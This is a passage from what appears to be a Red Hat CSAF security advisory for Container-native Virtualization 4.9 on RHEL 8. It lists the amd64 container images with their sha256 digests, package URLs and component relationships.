product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.9.6-7", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.9.6-51", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.9.6-6", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_id: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_id: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_id: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_id: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_id: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.9.6-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: 